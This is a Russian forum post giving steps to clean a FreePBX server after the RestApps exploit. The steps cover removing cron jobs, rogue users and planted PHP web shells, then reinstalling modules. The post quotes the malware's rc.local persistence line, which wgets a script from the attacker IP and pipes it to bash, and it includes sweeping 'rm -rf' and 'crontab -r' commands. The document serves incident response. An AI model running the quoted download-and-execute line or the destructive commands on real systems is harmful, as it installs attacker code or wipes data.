Продажа IP телефонов Htek по хоршим ценам

FreePBX уязвимость RestApps - очистка от эксплоита K.php с 37.49.230.74

Форум по коммуникационной платформе Asterisk и FreePBX.

Модератор: Wi$e

FreePBX уязвимость RestApps - очистка от эксплоита K.php с 37.49.230.74

Сообщение Wi$e » 20 янв 2022, 20:16

Привет.
Поделюсь опытом:

Проверяем наличие задач созданных эксплоитом
crontab -u root -l
crontab -u asterisk -l
Чистим:
crontab -u root -r
crontab -u asterisk -r

Чистим созданных эксплоитом пользователей
userdel -f supports
userdel -f supermaint
userdel -f sugarmaint

Удаляем context созданный эксплоитом
nano /etc/asterisk/extensions_custom.conf

Удаляем файлы
rm -rf /etc/subgid
rm -rf /etc/subgid.lock
rm -rf /etc/subgid-
rm -rf /etc/subgid+
rm -rf /etc/subuid
rm -rf /etc/subuid.lock
rm -rf /etc/subuid-
rm -rf /var/www/html/admin/views/ajax.php
rm -rf /var/www/html/digium_phones/
rm -rf /var/www/html/rest_phones/
rm -rf /var/www/html/rest_phones/ajax.php
rm -rf /var/www/html/admin/modules/core/ajax.php
rm -rf /var/www/html/digium_phones/ajax.php
rm -rf /var/www/html/admin/assets/js/config.php
rm -rf /var/www/html/admin/assets/config.php
rm -rf /var/www/html/admin/assets/ajax.php
rm -rf /var/www/html/admin/views/ajax.php
rm -rf /var/www/html/admin/views/.htaccess
rm -rf /var/lib/asterisk/bin/devnull2
rm -rf /var/www/html/admin/modules/freepbx_ha
rm -rf /usr/local/asterisk/ha_trigger
rm -rf /var/spool/asterisk/tmp/k
rm -rf /var/spool/asterisk/tmp/serv
rm -rf /tmp/test.sh
rm -rf /usr/sbin/sysadmin_ha

Если при блокировке IP адреса 37.49.230.74 , после входа в систему через SSH или терминал становится не доступна командная строка:
cp -rf /home/asterisk/.bashrc ~/.bashrc
cp -rf /home/asterisk/.bash_profile ~/.bash_profile
Удаляем (setsid wget "http://37.49.230.74/serv/?src=<<your_ip>> -O /var/spool/asterisk/tmp/serv 2>/dev/null >/dev/null; bash /var/spool/asterisk/tmp/serv 2>/dev/null > /dev/null & ) 2>&1
nano /etc/rc.local

Переустанавливаем модули для возвращения оригинальных скриптов
fwconsole ma downloadinstall framework --force
fwconsole ma downloadinstall restapps --force
fwconsole ma downloadinstall core --force
fwconsole reload
Если нужна помощь, услуги по настройке\обслуживанию или поставке оборудования, обращайтесь:
Телефон: +7 (499) 653-71-72 внутр. 101
С уважением, Денис.
Офисные АТС.ру
Аватара пользователя
Wi$e
Администратор
 
Торренты: 511
Комментарии: 63
Раздал: 198.26 Гб
Скачал: 2.29 Гб
Ратио: 86.531
Сообщения: 4564
Зарегистрирован: 18 июн 2006, 15:00
Откуда: Москва
Квалификация: Инженер ТЦ производителя
Организация: Офис-Девайс
Для Спасибо: Яндекс.Деньги:4100198401725

Вернуться в Asterisk и FreePBX

Кто сейчас на конференции

Сейчас этот форум просматривают: нет зарегистрированных пользователей и гости: 1


Продажа, установка и сервис IP-АТС Panasonic: KX-NS500, KX-NS1000, KX-NCP, KX-TDE, KX-TDA



Пириногвые IP-АТС Symway. Консультация, Поставка, Внедрение.
cron